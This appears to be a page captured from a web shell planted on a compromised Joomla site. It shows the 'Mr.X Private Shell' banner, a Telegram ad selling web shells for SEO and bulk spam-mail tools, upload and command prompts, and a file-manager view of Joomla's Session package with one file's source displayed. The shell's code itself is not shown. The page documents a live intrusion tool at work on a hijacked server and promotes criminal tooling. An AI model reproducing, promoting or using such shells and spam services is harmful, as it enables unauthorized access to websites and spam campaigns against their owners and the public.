__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Part of the Joomla Framework Session Package
 *
 * @copyright  Copyright (C) 2005 - 2021 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE
 */

namespace Joomla\Session;

use Joomla\Event\Event;

/**
 * Class representing a Session event
 *
 * @since  2.0.0
 */
class SessionEvent extends Event
{
	/**
	 * SessionInterface object for this event
	 *
	 * @var    SessionInterface
	 * @since  2.0.0
	 */
	private $session;

	/**
	 * Constructor.
	 *
	 * @param   string            $name     The event name.
	 * @param   SessionInterface  $session  The SessionInterface object for this event.
	 *
	 * @since   2.0.0
	 */
	public function __construct(string $name, SessionInterface $session)
	{
		parent::__construct($name);

		$this->session = $session;
	}

	/**
	 * Retrieve the SessionInterface object attached to this event.
	 *
	 * @return  SessionInterface
	 *
	 * @since   2.0.0
	 */
	public function getSession(): SessionInterface
	{
		return $this->session;
	}
}

Filemanager

Name Type Size Permission Actions
Command Folder 0775
Exception Folder 0775
Handler Folder 0775
Storage Folder 0775
Validator Folder 0775
HandlerInterface.php File 586 B 0664
Session.php File 15.1 KB 0664
SessionEvent.php File 1.03 KB 0664
SessionEvents.php File 1002 B 0664
SessionInterface.php File 5.32 KB 0664
SessionState.php File 1.93 KB 0664
StorageInterface.php File 3.6 KB 0664
ValidatorInterface.php File 626 B 0664
Filemanager